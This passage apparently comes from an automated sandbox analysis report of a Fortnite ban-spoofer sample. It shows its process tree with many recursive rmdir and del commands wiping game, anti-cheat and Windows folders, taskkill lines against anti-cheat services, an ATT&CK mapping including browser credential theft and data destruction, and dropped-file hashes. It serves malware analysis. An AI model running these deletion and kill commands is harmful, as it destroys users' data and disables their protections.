    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q D:\Users\username%\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\*.*
    3⤵
    PID:2176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q D:\Users\%username%\AppData\Local\Microsoft\Windows\WebCache\*.*
    3⤵
    PID:4784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC
    3⤵
    PID:5128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalCache
    3⤵
    PID:3672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings
    3⤵
    PID:3640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Program Files\Epic Games\Fortnite\Engine\Plugins
    3⤵
    PID:5320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Program Files\Epic Games\Fortnite\FortniteGame\Plugins
    3⤵
    PID:5952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Program Files\Epic Games\Fortnite\FortniteGame\PersistentDownloadDir
    3⤵
    PID:4680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Program Files\Epic Games\Fortnite\FortniteGame\Config
    3⤵
    PID:1280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q D:\ProgramData\Microsoft\DataMart\PaidWiFi\NetworksCache
    3⤵
    PID:1800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q D:\ProgramData\Microsoft\DataMart\PaidWiFi\Rules
    3⤵
    PID:1116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Cache
    3⤵
    PID:5980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\Temp
    3⤵
    PID:4568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache
    3⤵
    PID:288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\Microsoft\Windows\INetCookies
    3⤵
    PID:6000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\Microsoft\Windows\History
    3⤵
    PID:1948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\Intel
    3⤵
    PID:5812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
    3⤵
    PID:4180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\Microsoft\Feeds Cache
    3⤵
    PID:6068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Roaming\Microsoft\Windows\CloudStore
    3⤵
    PID:3008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\FortniteGame\Saved
    3⤵
    PID:5580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Windows\INF
    3⤵
    PID:4304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\ProgramData\%username%\Microsoft\XboxLive\NSALCache
    3⤵
    PID:6028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\Public\Documents
    3⤵
    PID:5280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Windows\Prefetch
    3⤵
    PID:5924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\D3DSCache
    3⤵
    PID:6104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\CrashReportClient
    3⤵
    PID:5392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Windows\temp
    3⤵
    PID:2216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\Microsoft\Windows\SettingSync\metastore
    3⤵
    PID:1700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Windows\SoftwareDistribution\DataStore\Logs
    3⤵
    PID:2320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\ProgramData\Microsoft\Windows\WER\Temp
    3⤵
    PID:2092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\AMD\DxCache
    3⤵
    PID:960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:5768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q E:\Users\username%\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\*.*
    3⤵
    PID:1452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q E:\Users\%username%\AppData\Local\Microsoft\Windows\WebCache\*.*
    3⤵
    PID:2172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC
    3⤵
    PID:2204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalCache
    3⤵
    PID:2176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings
    3⤵
    PID:5368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Program Files\Epic Games\Fortnite\Engine\Plugins
    3⤵
    PID:5496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Program Files\Epic Games\Fortnite\FortniteGame\Plugins
    3⤵
    PID:852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Program Files\Epic Games\Fortnite\FortniteGame\PersistentDownloadDir
    3⤵
    PID:3640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Program Files\Epic Games\Fortnite\FortniteGame\Config
    3⤵
    PID:6100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:5276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q E:\ProgramData\Microsoft\DataMart\PaidWiFi\NetworksCache
    3⤵
    PID:4680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q E:\ProgramData\Microsoft\DataMart\PaidWiFi\Rules
    3⤵
    PID:4636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Cache
    3⤵
    PID:1148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\Temp
    3⤵
    PID:3456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache
    3⤵
    PID:2308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\Microsoft\Windows\INetCookies
    3⤵
    PID:1800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\Microsoft\Windows\History
    3⤵
    PID:5980
- C:\Users\Admin\AppData\Local\Temp\Koks_Cleaner.exe
  "C:\Users\Admin\AppData\Local\Temp\Koks_Cleaner.exe"
  2⤵
  - Executes dropped EXE
  PID:1200
- C:\Users\Admin\AppData\Local\Temp\AccuracyFN Swoofer.exe
  "C:\Users\Admin\AppData\Local\Temp\AccuracyFN Swoofer.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2628
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C taskkill /F /IM EpicGamesLauncher.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1404
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4420
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C taskkill /F /IM EasyAntiCheatLauncher.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:452
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM EasyAntiCheatLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4864
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C taskkill /F /IM BEService.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3792
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM BEService.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1452
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C taskkill /F /IM Fortnite.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4496
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM Fortnite.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:220
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C taskkill /F /IM BattleEyeLauncher.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4500
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM BattleEyeLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c color 0A
    3⤵
    PID:2896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c title n*E*x*O*s*S*p*O*o*F*e*R
    3⤵
    PID:1232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c CLS
    3⤵
    PID:4904

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:956

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2288

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2228

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:2228

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:4268

C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv DYBIjQNS7kaiOpmff8wPJg.0.2
1⤵
PID:5584

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:5264

C:\Users\Admin\AppData\Roaming\NetworkEXP.exe
C:\Users\Admin\AppData\Roaming\NetworkEXP.exe
1⤵
PID:5892

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Direct Volume Access

T1006

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Data Destruction

T1485

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\BrowserMetrics\BrowserMetrics-6703B683-1378.pma

Filesize
4.0MB

MD5
c26c31bbd02454a2212eec0941b6ccc4

SHA1
ab4f2426af28f4384ffe725087b0a1edbee5b615

SHA256
235abd6bb3bea5237b5df7784c27b36e5150308511d08b3db6bad3149549ec7a

SHA512
abc7373b029843dcec4bdb3fed87314ee060b59fb1ef686b598ca563433d3dd6bf90ce86a736d6c990e8cdf23ccff59f2eda46068c27992dc3c65fe05b045bf5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\CrashpadMetrics-active.pma

Filesize
1024KB

MD5
9a31b075da019ddc9903f13f81390688

SHA1
d5ed5d518c8aad84762b03f240d90a2d5d9d99d3

SHA256
95cf4025babcd46069b425449c98ed15d97d364b2461417caa9aa0c13cb372e1

SHA512
a04726a429ae727d685f0836327c625d2f18d6327253216a9a31265a324b68b06bec4e7f1b744d261a0e67fa0a90c43719aeda9d2998f42525b0ff5640c7bf1e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Crashpad\settings.dat

Filesize
40B

MD5
73d076263128b1602fe145cd548942d0

SHA1
69fe6ab6529c2d81d21f8c664da47c16c2e663ae

SHA256
f2dd7199b48e34d54ee1a221f654ad9c04d8b606c02bdbe77b33b82fb2df6b29

SHA512
e371083407ee6a1e3436a3d1ea4e6a84f211c6ad7c501f7a09916a9ada5b50a39dcb9e8be7a4dee664ea88ec33be8c6197c2f0ac2eabe3c0691bc9d0ed4e415d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\Affiliation Database

Filesize
52KB

MD5
abd5f8ea3d9a79d25ad874145769b9fd

SHA1
0e5cb55791194d802b3d3983be3a34d364d7a78d

SHA256
50e624ab71e65f7bff466e9066621f0ee85e87f74eacd85f1952433294e1c5fd

SHA512
19126380f34e2a2517fda41cb1b824b4a0fb467b60126120deab669288fc3e851da481655dc1887f17762b6394957c4bee882dc233f7564433e25d947c80e66b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\BrowsingTopicsSiteData

Filesize
28KB

MD5
2fc3609b37500f785639ae7217b67a67

SHA1
f63d3b9b2e8eb98177742ebbccf2a18a64df33b3

SHA256
fae90e262589b5b22a1cd522972f9de32e9b0ee1a2df42aaa411437e5a49d753

SHA512
508fdfca95103f4213999eebe20c5d82bedfb01f01129538bfa7394556ca67b528322f662bf3128ca87e3ac0f0f58fb42345acda49ab67ba1d763084cf5ab05b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\BrowsingTopicsState

Filesize
414B

MD5
000643a439e2689b3fcc5cfbe5f4d530

SHA1
4421c1cccc080936153abb6aceb0ac363a358f10

SHA256
29fad1f7aeb1a38d765747548f3df48b368043ec7d6c13b11db3c57f6751a823

SHA512
ea071b5ac4648c824f93e8bf92138b593bef6779a4ef146a135509afbd87c383647666e4a01c1b88708a0b6d34e0775d76f8c5d01d9cf73086527e67c9774900

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\Cache\Cache_Data\data_0

Filesize
44KB

MD5
c52ce7fcd812a7e84344d241e321f5e0

SHA1
ac61adb1f6fdf8cd70e8bffd907e957ff6cc5f1c

SHA256
47a60d56bb7b88fb30e99dbb1f05a8020e24bc0d3b2e11bc6208ec2630f9c5f1

SHA512
4eaaf9819d1d0b87a5434692c090e356acab4e7108514c9e435c41acffadd949efe60ff50fa7f8fdde273a533b3c8b12cb4d8062afd32ad358185e1597341fae

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\Cache\Cache_Data\data_1

Filesize
264KB

MD5
2e35e5b8e9112fdd877d60c7fc93a9ed

SHA1
c1ade99f24b76be5d1e16a7c53362f5275fa2e92

SHA256
cb36ad69a9e74359249e5f78301f420a53e9459db5104750a5f0a9fd97413f32

SHA512
816e6e4a94ec1f29351385d8b92ffcc8a88cdc1aa038b3967d3fc0a1ac019f996aa93779215065aeeb89c0e71cf9013a173036150925bff4428618ab23c51e5f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\Cache\Cache_Data\data_2

Filesize
1.0MB

MD5
727ddba6c69d2e855820b57ad8a5cda7

SHA1
2d53b1c7e3ab91a0c3a33cfcf75b7d9d3bf1e202

SHA256
20b34e761ac58e4c1d3be056e0ca65e1372143e4dd4fad25c19f1f45f2e2fc19

SHA512
e3137d4f4b872046c2c0edf72b4a8f14751a2f265ae0703409a78ff2bd54f877924ec445b550e69d09171503cf47e6ddbbd341cfa7e935fb985add2545d3bc98

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\Cache\Cache_Data\data_3

Filesize
4.0MB

MD5
5852dec2890fb353af8485f504fa83d0

SHA1
4a2dc68c302933921d88ecf9c72b56730089e530

SHA256
c45fb6c2fe8d9d6acd7b21e4a17af77432ee3e37f4d24858e2880051ae29963d

SHA512
6cb72604ff8b93e7c2a9c467c1af594b9e07d8a17055860a81582a52c021964ab3ccc7a08c349d4b6ebbd428a6fd24a142c4e76d6a0b4ccd8976464ef9dac310

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\Cache\Cache_Data\f_000002

Filesize
62KB

MD5
9666d74b18f57389ee2d3dee5073f71a

SHA1
1830bc2670e616a1da1af27157159e6677a5ad63

SHA256
6fcb1e788f9a12b8ad937172802c41475f2180906db38d6507a3af6a2b721cae

SHA512
69ea6d6080b3ac00f4c4fcf9e00c9e16bd2c3373073f7dde3b1735fabeaaed1e7f8b76113e5ed2b9df08d089ca33ec367c595312f0c2f6e0fbad364464bc989b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\Cache\Cache_Data\f_000003

Filesize
41KB

MD5
abda4d3a17526328b95aad4cfbf82980

SHA1
f0e1d7c57c6504d2712cec813bc6fd92446ec9e8

SHA256
ee22a58fa0825364628a7618894bcacb1df5a6a775cafcfb6dea146e56a7a476

SHA512
91769a876df0aea973129c758d9a36b319a9285374c95ea1b16e9712f9aa65a1be5acf996c8f53d8cae5faf68e4e5829cd379f523055f8bcfaa0deae0d729170

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\Cache\Cache_Data\f_000004

Filesize
36KB

MD5
2f0843950fce7ab93eeb963976562526

SHA1
b860abd45739733c3bee8331b300900585f450cc

SHA256
c620378d9bcf12726a5e7d26968440038e027e5ef8cbec1db5d2329f0cb23c8d

SHA512
5bd4b917b57736daf0e64627fc1939555b111d7d3d728c76a340d8d9fffe96aad87503334f59524d66fc473a7a8e02a5344023c2a789c25c5a9f9770c688a532

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\Cache\Cache_Data\index

Filesize
512KB

MD5
346b951a57f10b99304792aeca9d2a14

SHA1
1d6b12de85693f2a6c2d29d59bc2694d104d610d

SHA256
6cfbec2361c33c7eeb2a707567f30fc9c4e7eef747101340b448c718c1eaec1a

SHA512
b81cea3b4a389647c95f5f91ca85c47b1dae2a32aeafe1f9f055b91762e381307d3ddfc24dc0d0f6f6a9bc94e2bc9b7a3506d57f7343d0c50e4148b164b78a0a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\Code Cache\js\7018b8cf1c3b00c7_0

Filesize
306B

MD5
3b18b6ad8155273668bd9187c1e372fc

SHA1
ff8b934310e0439f22d3f654b281573517443b01

SHA256
f2e4981a6f3e7a5cf67e7c26874a0feeefc18599d7ff727c0921ff935d9af035

SHA512
64e4f8e0b89bf78005ef11f6d27af31ff3b08415403e702b410e6ed093417fc1a81feb47f2d215510d35d060a6265a78db9daca3e5908037f149f280636c4b73

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\Code Cache\js\ba678a2fbd8c358c_0

Filesize
298B

MD5
3c1f0923f0d7fbdca8796e627009f9fc

SHA1
625d5fe636805864440dd52a6ab0d3e78339c272

SHA256
b2066f7bc9acc85ef8cf6cb150538718f382fe9a771f4d2a503515a23d0c096a

SHA512
dee21741b39f2596024adeaefa6c2e64e1dac75dd6dc717ddc084c5cb77a767eced11f553407cde53df702bcf00fc79ba3fc98e285ca3c6b5a6c2abeb441fd6b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\Code Cache\js\index-dir\the-real-index

Filesize
96B

MD5
1406d8dab3e0d02ba7f59770f81381b4

SHA1
cf69407626afef95ff156596020a1f506a418a49

SHA256
b30cffbd85a6c4c0f07e836ea36b6d0d0bec125e2a661847305efa4e3a929b84

SHA512
96b9162354ded4cc28073f331e83ca0a0ecc63cbe0b3bb149f3db1d20afef7d4268915f385bdd3d66f3c263ebc59f14f6bdad322cb58ced27c1430e2ab36ae27

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\Code Cache\wasm\index-dir\the-real-index

Filesize
48B

MD5
958d050d7095eb8cd30d40ce0f11e2a2

SHA1
26450fb68fbf52fc186c818e1e1a7bfc2f032e4d

SHA256
6e08721a5c82ad851a413614472bdb782fdf915f5a0bd9d9b5bc0873f9d435cb

SHA512
a542354a8a827b58cfe4c3a7a482bf42695103809d3da5c76e0636852e8eee1f0fac70c6a5c269eb12334edcf0f8a1b837bf7d91920b01ac63951a70c2048bc7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\DIPS

Filesize
28KB

MD5
1731468583199e6caffcb85d122ba61b

SHA1
398cf069ec5cfd8607e67cb60cfbb8c9d5667c91

SHA256
7624a83cf8ba93e29e4ac25706f6616f7e6c7fc9e6030d7facc2a5614ae058d2

SHA512
b1e729c64b56fe7c95a1d4fc0cbddc875c6e220b84cf99e7a85a6522f71b19540d94affe930cfb2e64109be6e50b825c1ce0bb55fc2b925928e7900bcc736cc2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\DawnCache\index

Filesize
256KB

MD5
95c07d8a71623f41508b2ff47ca82226

SHA1
d4ad0917270a5006f3be6ca2b19e003d2522ea23

SHA256
824639e8587bd6deccb361cd6ccf061e82b76e97745b4cdaf09cf22cf59f4452

SHA512
e0315b36ce709657de426e5f549864a1de635e86c174379d36757d7deb300a11ac40d5938a32f00e304a1a41c9e5f2eb7806296c898642ffc3b187041c9ad9a9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\Extension Rules\000003.log

Filesize
114B

MD5
891a884b9fa2bff4519f5f56d2a25d62

SHA1
b54a3c12ee78510cb269fb1d863047dd8f571dea

SHA256
e2610960c3757d1757f206c7b84378efa22d86dcf161a98096a5f0e56e1a367e

SHA512
cd50c3ee4dfb9c4ec051b20dd1e148a5015457ee0c1a29fff482e62291b32097b07a069db62951b32f209fd118fd77a46b8e8cc92da3eaae6110735d126a90ee

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\Extension Rules\LOG

Filesize
279B

MD5
75ed8cfd2288980c0b367ca70cef900e

SHA1
4dde3d1aace9c358e70d04bc0e0118f294019c06

SHA256
144570c0138713e7d38f1e42fd4efdcab6b26899de9de64dd6a8abcc5cb0cb65

SHA512
0105861acbc44786fcab316dca74398176eaa1c9d1278c6d4b259add6fd4d9e04d491a7caf01edbb8f6f3e7f7ff25fe09ebc4a788b61ce4f9ba793853b89b762

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index

Filesize
24B

MD5
54cb446f628b2ea4a5bce5769910512e

SHA1
c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

SHA256
fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

SHA512
8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\databases\Databases.db

Filesize
28KB

MD5
315332044706528a5fe8a6dde075f0b3

SHA1
00afb7ad87d6b357f2ab8d7717a67951a2a9f0aa

SHA256
05cf19b9848e82ca48587087b680ad6e5bf0c898e9505125e3b6ef46f7371d75

SHA512
6e8553ab19864090437b9c006832a704cd3afde129af4b272598ca0e1da81e473aed4add82f857bfce30042924fe6072958e766d7154c8d70ce0ba8ab6744fe6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\GraphiteDawnCache\data_0

Filesize
8KB

MD5
cf89d16bb9107c631daabf0c0ee58efb

SHA1
3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b

SHA256
d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e

SHA512
8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\GraphiteDawnCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

